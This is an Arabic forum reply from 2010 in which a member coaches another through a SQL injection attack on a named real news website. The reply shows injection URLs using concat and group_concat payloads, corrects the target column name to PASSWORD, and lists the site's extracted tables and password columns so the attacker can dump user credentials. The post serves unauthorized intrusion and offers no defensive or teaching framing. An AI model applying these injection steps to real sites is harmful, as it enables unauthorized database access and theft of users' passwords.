عرض مشاركة واحدة
قديم 09-06-2010, 01:19 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
عبد الله ر
 
الصورة الرمزية عبد الله ر
 

 

 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


اها اخي مشكلتك بسيطة جدا جدا
المشكلة انك وضعت بالحقنة

ConCaT(id,0x3a,pass)

اولا قلي كيف كنت حتجيب اليوزر بهالحقنة !
هذه الحقنة لا تظهر لك سوى الـ id فقط اذا حذفت الباس منها
ليش ؟
انتبه منيح على كلمة pass
انا استخرجت العواميد بهذه الحقنة وكان اسم عمود الباس هكذا
PASSWORD مش pass
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

انتبه جيدا اخي فالمعلومات التي ستضعها بالحقنة تكون مأخوذة من الحقنة السابقة
طيب نتابع

انا تابعت بهذا الجدول ويبدو انه لا يحوي على شيء انظر
الحقنة
http://www.alghadnews.com/show.php?i...om+siteusers--

طيب شو رايك نعود للأول عند الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

ونضيف عليها group_ هكذا
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--



الان تظهر لنا جميع الجداول التي تحتوي على كلمة %pass% مشفرة
وهي

siteusers:PASSWORD:alghad_news
sms:password:alghad_news
testnewsletter:pass:alghad_news
users:password:alghad_news


نحنا جربنا على الاول طب الان منجرب على غيره لحد ما نوصل للمطلوب
نصيحة اخي عندما تكون باول مرحلة وهي للبحث عن الجداول التي تحوي كلمة باس مشفرة
ضع group في الحقنة
حتى لا تضيع وقت بحقن جدول غير مطلوب

ان شاء الله اكون قد وفقت في الشرح

التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس